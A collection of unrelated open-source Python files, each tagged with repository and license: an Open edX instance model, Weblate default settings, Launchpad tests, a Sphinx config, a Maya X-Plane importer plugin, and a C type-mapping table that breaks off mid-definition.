    When provisioning users, we don't want to force incompatible changes
    (e.g., in email) if we've previously provisioned a database with the
    variables we were interested in initially. Therefore this returns False
    as soon as an appserver (read: database) has ever been provisioned
    successfully for this instance.
    """
    already_provisioned = self.successfully_provisioned
    return not already_provisioned
def terminate_obsolete_appservers(self, days=2):
    """
    Terminate app servers that were created more than `days` before now, except:
    - the active appserver(s) if there are any,
    - a release candidate (rc) appserver, to allow testing before the next appserver activation
      (we keep the most recent running appserver)
    - a fallback appserver, for `days` after activating an appserver, to allow reverts
      (we keep the most recent running appserver created before the latest activation)
    """
    latest_active_appserver = None
    if self.get_active_appservers().exists():
        latest_active_appserver = self.get_active_appservers().latest('last_activated')
    fallback_appserver = None
    rc_appserver = None
    now = timezone.now()

    # Newest first: the first matching "running" appserver we encounter is the
    # most recent one, which is the one we want to keep as fallback/rc.
    for appserver in self.appserver_set.all().order_by('-created'):
        # Skip active appservers
        if appserver.is_active:
            continue

        # Keep a running appserver as fallback for `days` after latest activation, to allow reverts
        if latest_active_appserver and appserver.created < latest_active_appserver.last_activated:
            if not sufficient_time_passed(latest_active_appserver.last_activated, now, days) \
                    and not fallback_appserver and appserver.status == AppServerStatus.Running:
                fallback_appserver = appserver
            elif sufficient_time_passed(appserver.created, now, days):
                appserver.terminate_vm()

        # Keep the most recent running appserver created after activation (or when none is activated)
        # to allow testing of a release candidate (rc)
        else:
            if not rc_appserver and appserver.status == AppServerStatus.Running:
                rc_appserver = appserver
            elif sufficient_time_passed(appserver.created, now, days):
                appserver.terminate_vm()
def archive(self, **kwargs):
    """
    Shut down this instance's app servers, mark it as archived and
    remove its metadata from Consul.

    Keyword Args:
        ignore_errors (bool): Passed to remove_dns_records(); when True, DNS
            removal failures will not abort the archive process.
    """
    ignore_errors = kwargs.pop('ignore_errors', False)
    self.logger.info('Archiving instance started.')
    self.disable_monitoring()

    # Only touch DNS if there is at least one active appserver serving traffic.
    active_appservers = self.get_active_appservers()
    if active_appservers.count() > 0:
        self.clean_up_appserver_dns_records()
        self.remove_dns_records(ignore_errors=ignore_errors)

    # Detach from the load balancer *before* reconfiguring it, so the
    # reconfiguration no longer includes this instance.
    if self.load_balancing_server is not None:
        load_balancer = self.load_balancing_server
        self.load_balancing_server = None
        self.save()
        self.reconfigure_load_balancer(load_balancer)

    for appserver in self.appserver_set.iterator():
        appserver.terminate_vm()
    self.deprovision_rabbitmq()
    self.purge_consul_metadata()
    self.disable_users()
    super().archive()
    self.logger.info('Archiving instance finished.')
def disable_users(self):
    """
    Deactivate the non-superuser users associated with this instance.

    Superusers are left untouched; everyone else has ``is_active`` cleared
    and is saved back to the database.
    """
    for lms_user in self.lms_users.filter(is_superuser=False):
        lms_user.is_active = False
        lms_user.save()
@staticmethod
def shut_down():
    """
    Removed API: shut_down() was replaced by archive().

    Raise immediately so shell users who call this directly are pointed at
    the replacement instead of silently doing nothing.
    """
    message = (
        "Use archive() to shut down all of an instances app servers "
        "and remove it from the instance list."
    )
    raise AttributeError(message)
def delete(self, *args, **kwargs):  # pylint: disable=arguments-differ
    """
    Delete this Open edX Instance and its associated AppServers, and deprovision external databases and storage.

    This is handy for development but should not be used in production - just use archive() instead.

    Note:
        There is no boolean flag to ignore Swift or S3 errors
        because when calling `self.deprovision_swfit()` or
        `self.deprovision_s3()` errors are logged but not raised.

    Arguments:
        ignore_errors (bool): Ignore all errors if `True`.
        ignore_mysql_errros (bool): Ignore MySQL errors.
        ignore_mongo_errors (bool): Ignore Mongo errors.
        ignore_rabbitmq_errors (bool): Ignore RabbitMQ errors.
    """
    self.logger.info('Deleting instance: %s.', str(self))
    # `ignore_errors` acts as the default for every per-service flag below;
    # each specific flag can still override it.
    ignore_errors = kwargs.pop('ignore_errors', False)
    self.archive(ignore_errors=kwargs.pop('ignore_archive_errors', ignore_errors))
    self.deprovision_mysql(ignore_errors=kwargs.pop('ignore_mysql_errors', ignore_errors))
    self.deprovision_mongo(ignore_errors=kwargs.pop('ignore_mongo_errors', ignore_errors))
    self.deprovision_swift()
    self.deprovision_s3()
    self.deprovision_rabbitmq(ignore_errors=kwargs.pop('ignore_rabbitmq_errors', ignore_errors))
    super().delete(*args, **kwargs)
@property
def consul_prefix(self):
    """
    This is a property that helps determining a specific instance's prefix in
    Consul. The prefix helps in keeping different instances' configurations
    separate from overrides and modifications.

    :return: A unique Key-Value prefix for this instance in Consul.
    """
    return settings.CONSUL_PREFIX.format(ocim=settings.OCIM_ID, instance=self.id)
def _generate_consul_metadata(self):
    """
    Collects required configurations for this instance to reflect on Consul.
    You can add, delete or alter configurations keys and values here which are
    going to be reflected in Consul immediately.

    :return: A dict of the configurations.
    """
    dns_records_updated = self.dns_records_updated.timestamp() if self.dns_records_updated else None
    active_servers = self.get_active_appservers()
    basic_auth = self.http_auth_info_base64()
    # Health checks only make sense with more than one active server; with a
    # single server there is nothing to fail over to.
    enable_health_checks = active_servers.count() > 1
    # Flatten each active appserver down to its id and public IP
    # (annotated from the related server row).
    active_servers_data = list(active_servers.annotate(public_ip=F('server___public_ip')).values('id', 'public_ip'))

    return {
        'domain_slug': self.domain_slug,
        'domain': self.domain,
        'name': self.name,
        'domains': self.get_load_balanced_domains(),
        'dns_records_updated': dns_records_updated,
        'health_checks_enabled': enable_health_checks,
        'basic_auth': basic_auth,
        'active_app_servers': active_servers_data,
    }
def _write_metadata_to_consul(self, configurations):
    """
    Reflect the passed configurations to Consul under this instance's prefix.

    If at least one field was successfully updated in Consul, the
    configurations' version number is incremented.

    :note: This still doesn't apply removed-configurations case.
    :param configurations: A dict object that contains the configurations
           to be written to Consul.
    :return: A pair (version, changed) with the current version number and
             a bool indicating whether the information was updated.
    """
    agent = ConsulAgent(prefix=self.consul_prefix)
    return agent.create_or_update_dict(configurations)
def update_consul_metadata(self):
    """
    This method is going over some pre-defined configurations fields
    in this model to reflect their values on Consul.
    If we successfully updated at least one field in Consul
    then the configurations' version number is gonna be incremented.

    :return: A pair (version, changed) with the current version number and
             a bool to indicate whether the information was updated.
    """
    # No-op when Consul integration is disabled or the instance is archived;
    # report version 0 / unchanged in that case.
    if not settings.CONSUL_ENABLED or self.ref.is_archived:
        return 0, False

    new_configurations = self._generate_consul_metadata()
    version, updated = self._write_metadata_to_consul(new_configurations)

    return version, updated
def purge_consul_metadata(self):
    """
    Remove every piece of this instance's metadata from Consul, if any
    exists. Does nothing when Consul integration is disabled.
    """
    if not settings.CONSUL_ENABLED:
        return

    prefix = self.consul_prefix
    self.logger.info('Purging consul metadata with prefix: %s.', prefix)
    ConsulAgent(prefix=prefix).purge()
def get_provisioning_appservers(self):
    """
    Returns a queryset of AppServers that are currently in the process of being launched,
    i.e. whose status is one of the "configuration" states.
    """
    in_progress_statuses = AppServerStatus.states_with(ids_only=True, is_configuration_state=True)
    return self.appserver_set.filter(_status__in=in_progress_statuses)
| open-craft/opencraft | instance/models/openedx_instance.py | Python | agpl-3.0 | 28,216 |
# Default user-overridable Weblate settings; each key can be overridden in a
# local settings file.
USER_SETTINGS = {
    'DEBUG': True,

    # Local time zone for this installation. Choices can be found here:
    # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
    # although not all choices may be available on all operating systems.
    # On Unix systems, a value of None will cause Django to use the same
    # timezone as the operating system.
    # If running in a Windows environment this must be set to the same as your
    # system time zone.
    'TIME_ZONE': 'UTC',

    # Language code for this installation. All choices can be found here:
    # http://www.i18nguy.com/unicode/language-identifiers.html
    'LANGUAGE_CODE': 'en-us',

    # URL prefix to use, please see documentation for more details
    'URL_PREFIX': '',

    # Title of site to use
    'SITE_TITLE': 'Weblate',

    # E-mail address that error messages come from.
    'SERVER_EMAIL': 'noreply@weblate.org',

    # Default email address to use for various automated correspondence from
    # the site managers. Used for registration emails.
    'DEFAULT_FROM_EMAIL': 'noreply@weblate.org',

    # List of URLs your site is supposed to serve, required since Django 1.5
    'ALLOWED_HOSTS': [],

    # Toggle user registration
    'REGISTRATION_OPEN': True
}
| capitalm-chen/weblate-docker-fig | build/weblate/settings_user_default.py | Python | gpl-2.0 | 1,248 |
# Copyright 2011 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
__metaclass__ = type
from zope.component import getUtility
from lp.services.worlddata.interfaces.language import ILanguageSet
from lp.testing import (
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
class TestQuestionDirectSubscribers(TestCaseWithFactory):
    """Tests for the direct-subscriber APIs of Question."""

    layer = DatabaseFunctionalLayer

    def test_get_direct_subscribers(self):
        # The question owner is subscribed automatically; subscribing a
        # second person should make both appear as direct subscribers.
        question = self.factory.makeQuestion()
        subscriber = self.factory.makePerson()
        subscribers = [question.owner, subscriber]
        with person_logged_in(subscriber):
            question.subscribe(subscriber, subscriber)
        direct_subscribers = question.getDirectSubscribers()
        self.assertEqual(
            set(subscribers), set(direct_subscribers),
            "Subscribers did not match expected value.")

    def test_get_direct_subscribers_with_details_other_subscriber(self):
        # getDirectSubscribersWithDetails() returns
        # Person and QuestionSubscription records in one go.
        question = self.factory.makeQuestion()
        with person_logged_in(question.owner):
            # Unsubscribe question owner so it doesn't taint the result.
            question.unsubscribe(question.owner, question.owner)
        subscriber = self.factory.makePerson()
        subscribee = self.factory.makePerson()
        with person_logged_in(subscriber):
            # One person subscribes another; the subscription is recorded
            # against the subscribee.
            subscription = question.subscribe(subscribee, subscriber)
        self.assertContentEqual(
            [(subscribee, subscription)],
            question.getDirectSubscribersWithDetails())

    def test_get_direct_subscribers_with_details_self_subscribed(self):
        # getDirectSubscribersWithDetails() returns
        # Person and QuestionSubscription records in one go.
        question = self.factory.makeQuestion()
        with person_logged_in(question.owner):
            # Unsubscribe question owner so it doesn't taint the result.
            question.unsubscribe(question.owner, question.owner)
        subscriber = self.factory.makePerson()
        with person_logged_in(subscriber):
            subscription = question.subscribe(subscriber, subscriber)
        self.assertContentEqual(
            [(subscriber, subscription)],
            question.getDirectSubscribersWithDetails())
class TestQuestionInDirectSubscribers(TestCaseWithFactory):
    """Tests for the indirect-subscriber APIs of Question."""

    layer = DatabaseFunctionalLayer

    def test_answerContactIsIndirectSubscriber(self):
        # Question answer contacts are indirect subscribers to questions.
        person = self.factory.makePerson()
        # Answer contacts must have at least one language set.
        person.addLanguage(getUtility(ILanguageSet)['en'])
        question = self.factory.makeQuestion()
        with person_logged_in(question.owner):
            question.target.addAnswerContact(person, person)
        # Check the results.
        self.assertEqual([person], question.getIndirectSubscribers())

    def test_assigneeIsIndirectSubscriber(self):
        # Question assignees are indirect subscribers to questions.
        person = self.factory.makePerson()
        question = self.factory.makeQuestion()
        with person_logged_in(question.owner):
            question.assignee = person
        # Check the results.
        self.assertEqual([person], question.getIndirectSubscribers())

    def test_answerContactIsIndirectSubscriberCorrectLanguage(self):
        # Question answer contacts are indirect subscribers to questions and
        # are filtered according to the question's language.
        english_person = self.factory.makePerson()
        english_person.addLanguage(getUtility(ILanguageSet)['en'])
        spanish = getUtility(ILanguageSet)['es']
        spanish_person = self.factory.makePerson()
        spanish_person.addLanguage(spanish)
        question = self.factory.makeQuestion(language=spanish)
        with person_logged_in(question.owner):
            question.target.addAnswerContact(english_person, english_person)
            question.target.addAnswerContact(spanish_person, spanish_person)
        # Only the answer contact speaking the question's language (Spanish)
        # should be returned.
        self.assertEqual([spanish_person], question.getIndirectSubscribers())
| abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/answers/model/tests/test_question.py | Python | agpl-3.0 | 4,271 |
# -*- coding: utf-8 -*-
#
# napalm documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 16 13:17:14 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Concatenate the class docstring and the __init__ docstring when
# documenting classes with autodoc.
autoclass_content = 'both'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'pyPluribus'
copyright = u'2016, CloudFlare, Inc.'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3'
# The full version, including alpha/beta/rc tags.
release = '0.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# Read the Docs sets the READTHEDOCS environment variable to the string
# 'True' during its builds; use it to detect where we are building.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'

if not on_rtd:  # only import and set the theme if we're building docs locally
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
else:
    # RTD injects its own theme configuration, so fall back to the default.
    html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pypluribusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'pypluribus.tex', u'pyPluribus Documentation',
u'Mircea Ulinic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyPluribus', u'pyPluribus Documentation',
[u'Mircea Ulinic'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyPluribus', u'pyPluribus Documentation',
u'Mircea Ulinic', 'pyPluribus', 'Python library to interact with Pluribus devices.',
'Python library to interact with Pluribus devices.'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mirceaulinic/pypluribus | docs/conf.py | Python | apache-2.0 | 8,555 |
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import sys
from io import XPlaneOBJReader
# Initialize the script plug-in
def initializePlugin(mobject):
    """Maya entry point: register the plug-in command on plug-in load."""
    mplugin = OpenMayaMPx.MFnPlugin(mobject)
    try:
        # NOTE(review): neither `kPluginCmdName` nor `cmdCreator` is defined
        # anywhere in this file — presumably expected from elsewhere; as-is
        # this raises NameError on load. TODO confirm/define them.
        mplugin.registerCommand( kPluginCmdName, cmdCreator )
    except:
        sys.stderr.write( "Failed to register command: %s\n" % kPluginCmdName )
        raise
def uninitializePlugin(mobject):
    """Maya entry point: deregister the plug-in command on plug-in unload."""
    mplugin = OpenMayaMPx.MFnPlugin(mobject)
    try:
        # NOTE(review): `kPluginCmdName` is not defined in this file — see
        # the matching note in initializePlugin().
        mplugin.deregisterCommand( kPluginCmdName )
    except:
        sys.stderr.write( "Failed to unregister command: %s\n" % kPluginCmdName )
        raise
class scriptedCommand(OpenMayaMPx.MPxCommand):
    """Maya command that reads an X-Plane OBJ file and builds a polygon mesh
    (with UVs) from its vertex and face data."""

    def __init__(self):
        OpenMayaMPx.MPxCommand.__init__(self)

    def doIt(self, argList):
        """Build a Maya mesh from the X-Plane OBJ data and assign it to the
        default shading group.

        :param argList: MArgList passed by Maya; currently only printed —
            the OBJ path is not yet taken from it (see TODO below).
        """
        print(argList)
        print("ARG LIST ABOVE")
        xpreader = XPlaneOBJReader()
        geoObj = xpreader.read("")  # TODO: take the OBJ path from argList

        # Bug fix: the top of this file imports the API as
        # ``import maya.OpenMaya as OpenMaya``, which binds only the name
        # ``OpenMaya`` — the original code referenced ``maya.OpenMaya.*``,
        # raising NameError at runtime.
        outputMesh = OpenMaya.MObject()

        numFaces = len(geoObj.polyList)
        numVertices = len(geoObj.vertexList)
        print("VERT COUNT: %d" % numVertices)
        print("FACE COUNT: %d" % numFaces)

        points = OpenMaya.MFloatPointArray()
        uArray = OpenMaya.MFloatArray()
        vArray = OpenMaya.MFloatArray()

        # Convert the reader's vertices into Maya point/UV arrays.
        print("CREATING VERTICIES")
        for vertex in geoObj.vertexList:
            points.append(OpenMaya.MFloatPoint(vertex.x, vertex.y, vertex.z))
            uArray.append(vertex.u)
            vArray.append(vertex.v)

        # Vertex connections per poly face, as one flat array of indices
        # into the point array above.
        faceConnects = OpenMaya.MIntArray()
        for point in geoObj.pointList:
            faceConnects.append(point)

        # Number of vertices each face has.
        faceCounts = OpenMaya.MIntArray()
        for poly in geoObj.polyList:
            faceCounts.append(len(poly.points))

        meshFS = OpenMaya.MFnMesh()
        # Create the mesh and its UVs in a single call.
        newMesh = meshFS.create(numVertices, numFaces, points, faceCounts,
                                faceConnects, uArray, vArray, outputMesh)
        meshFS.updateSurface()

        nodeName = meshFS.name()
        print('Mesh node name is: %s' % nodeName)

        # Assign the new mesh to the default shading group. Bug fix:
        # ``maya.cmds`` was never imported at module level, so import it here.
        from maya import cmds
        cmds.sets(nodeName, e=True, fe='initialShadingGroup')
| renderbox/xplane-maya | mayaXPlaneImporter.py | Python | mit | 2,851 |
"""
TODO: npy_void
"""
import numpy
from capi import sctypebits
scalar = dict(
c_char = dict(\
ctype = 'signed char',
init = ' = 0',
argument_format = 'b',
return_format = 'b',
argument_title = 'a python integer (converting to C signed char)',
return_title = 'a python integer (converting from C signed char)',
),
c_short = dict(\
ctype = 'short int',
init = ' = 0',
argument_format = 'h',
return_format = 'h',
argument_title = 'a python integer (converting to C short int)',
return_title = 'a python integer (converting from C short int)',
),
c_int = dict(\
ctype = 'int',
init = ' = 0',
argument_format = 'i',
return_format = 'i',
argument_title = 'a python integer (converting to C int)',
return_title = 'a python integer (converting from C int)',
),
c_long = dict(\
ctype = 'long',
init = ' = 0',
argument_format = 'l',
return_format = 'l',
argument_title = 'a python integer (converting to C long int)',
return_title = 'a python integer (converting from C long int)',
),
c_long_long = dict(\
ctype = 'PY_LONG_LONG',
init = ' = 0',
argument_format = 'L',
return_format = 'L',
argument_title = 'a python integer (converting to C PY_LONG_LONG)',
return_title = 'a python integer (converting from C PY_LONG_LONG)',
),
c_unsigned_char = dict(\
ctype = 'unsigned char',
init = ' = 0',
argument_format = 'B',
return_format = 'B',
argument_title = 'a python integer (converting to C unsigned char)',
return_title = 'a python integer (converting from C unsigned char)',
),
c_unsigned_short = dict(\
ctype = 'unsigned short int',
init = ' = 0',
argument_format = 'H',
return_format = 'H',
argument_title = 'a python integer (converting to C unsigned short int)',
return_title = 'a python integer (converting from C unsigned short int)',
),
c_unsigned_int = dict(\
ctype = 'unsigned int',
init = ' = 0',
argument_format = 'I',
return_format = 'I',
argument_title = 'a python integer (converting to C unsigned int)',
return_title = 'a python integer (converting from C unsigned int)',
),
c_unsigned_long = dict(\
ctype = 'unsigned long',
init = ' = 0',
argument_format = 'k',
return_format = 'k',
argument_title = 'a python integer (converting to C unsigned long int)',
return_title = 'a python integer (converting from C unsigned long int)',
),
c_unsigned_long_long = dict(\
ctype = 'unsigned PY_LONG_LONG',
init = ' = 0',
argument_format = 'K',
return_format = 'K',
argument_title = 'a python integer (converting to C unsigned PY_LONG_LONG)',
return_title = 'a python integer (converting from C unsigned PY_LONG_LONG)',
),
c_float = dict(\
ctype = 'float',
init = ' = 0.0',
argument_format = 'f',
return_format = 'f',
argument_title = 'a python floating point number (converting to C float)',
return_title = 'a python floating point number (converting from C float)',
),
c_double = dict(\
ctype = 'double',
init = ' = 0.0',
argument_format = 'd',
return_format = 'd',
argument_title = 'a python floating point number (converting to C double)',
return_title = 'a python floating point number (converting from C double)',
),
c_Py_complex = dict(\
ctype = 'Py_complex',
argument_format = 'D',
return_format = 'D',
init = ' = {0.0, 0.0}',
argument_title = 'a python complex number (converting to C Py_complex structure)',
return_title = 'a python complex number (converting from C Py_complex structure)',
),
c_Py_ssize_t = dict(\
ctype = 'Py_ssize_t',
argument_format = 'n',
return_format = 'n',
init = ' = 0',
argument_title = 'a python integer (converting to C Py_ssize_t)',
return_title = 'a python integer (converting from C Py_ssize_t)',
),
c_char1 = dict(\
ctype = 'char',
argument_format = 'c',
return_format = 'c',
init = " = '\\0'",
argument_title = 'a python character (converting to C char)',
return_title = 'a python character (converting from C char)',
),
c_const_char_ptr = dict(\
ctype = 'const char *',
argument_format = 'z',
return_format = 'z',
init = ' = NULL',
argument_title = 'a python string or Unicode or None object (converting to C const char *)',
return_title = 'a python string or None (converting from C char *)',
),
c_char_ptr = dict(\
ctype = 'char *',
argument_format = 'O&',
argument_converter = 'pyobj_to_char_ptr',
clean_argument_converter = 'clean_pyobj_to_char_ptr',
return_format = 'z',
init = ' = NULL',
argument_title = 'a python string (converting to C char *)',
return_title = 'a python string or None (converting from C char *)',
),
c_Py_UNICODE_ptr = dict(\
ctype = 'Py_UNICODE*',
argument_format ='u',
return_format = 'u',
init = ' = NULL',
argument_title = 'a python Unicode object (converting to C Py_UNICODE*)',
return_title = 'a python Unicode object or None (converting from C Py_UNICODE*)'
),
py_bool = dict(\
ctype = 'PyBoolObject*',
init = ' = NULL',
pyctype = 'PyBool_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python bool'
),
py_int = dict(\
ctype = 'PyIntObject*',
init = ' = NULL',
pyctype = 'PyInt_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python integer'
),
py_long = dict(\
ctype = 'PyLongObject*',
init = ' = NULL',
pyctype = 'PyLong_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python long integer'
),
py_float = dict(\
ctype = 'PyFloatObject*',
init = ' = NULL',
pyctype = 'PyFloat_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python floating point number'
),
py_complex = dict(\
ctype = 'PyComplexObject*',
init = ' = NULL',
pyctype = 'PyComplex_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python complex number'
),
py_str = dict(\
ctype = 'PyStringObject*',
init = ' = NULL',
argument_format = 'S',
return_format = 'N',
title = 'a python string'
),
py_unicode = dict(\
ctype = 'PyUnicodeObject*',
init = ' = NULL',
argument_format = 'U',
return_format = 'N',
title = 'a python Unicode object'
),
py_buffer = dict(\
pyctype = 'PyBuffer_Type',
ctype = 'PyBufferObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python buffer'),
py_tuple = dict(\
pyctype = 'PyTuple_Type',
ctype = 'PyTupleObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python tuple'),
py_list = dict(\
pyctype = 'PyList_Type',
ctype = 'PyListObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python list'),
py_dict = dict(\
pyctype = 'PyDict_Type',
ctype = 'PyDictObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python dictionary'),
py_file = dict(\
pyctype = 'PyFile_Type',
ctype = 'PyFileObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python file object'),
py_instance = dict(\
pyctype = 'PyInstance_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python instance object'),
py_function = dict(\
pyctype = 'PyFunction_Type',
ctype = 'PyFunctionObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python function object'),
py_method = dict(\
pyctype = 'PyMethod_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python instance method object'),
py_module = dict(\
pyctype = 'PyModule_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python module object'),
py_iter = dict(\
pyctype = 'PySeqIter_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python iterator'),
py_property = dict(\
pyctype = 'PyProperty_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python property attribute'),
py_slice = dict(\
pyctype = 'PySlice_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python slice object'),
py_cell = dict(\
pyctype = 'PyCell_Type',
ctype = 'PyCellObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL'),
py_generator = dict(\
pyctype = 'PyGen_Type',
ctype = 'PyGenObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL'),
py_set = dict(\
pyctype = 'PySet_Type',
ctype = 'PySetObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python set object'),
py_frozenset = dict(\
pyctype = 'PyFrozenSet_Type',
ctype = 'PySetObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python frozenset object'),
py_cobject = dict(\
ctype = 'PyCObject*',
argument_format = 'O',
return_format = 'N',
init = ' = NULL',
title = 'a PyCObject object'),
py_type = dict(\
pyctype = 'PyType_Type',
ctype = 'PyTypeObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python type object'),
py_object = dict(\
ctype = 'PyObject*',
argument_format = 'O',
return_format = 'N',
init = ' = NULL',
title = 'a python object'),
numeric_array = dict(\
pyctype = 'PyArray_Type',
ctype = 'PyArrayObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a Numeric array',
require_numeric = True,
),
numpy_ndarray = dict(\
pyctype = 'PyArray_Type',
ctype = 'PyArrayObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a numpy array',
require_numpy = True,
),
numpy_descr = dict(\
pyctype = 'PyArrayDescr_Type',
ctype = 'PyArray_Descr*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
require_numpy = True,
),
numpy_ufunc = dict(\
pyctype = 'PyUFunc_Type',
ctype = 'PyUFuncObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a numpy universal function',
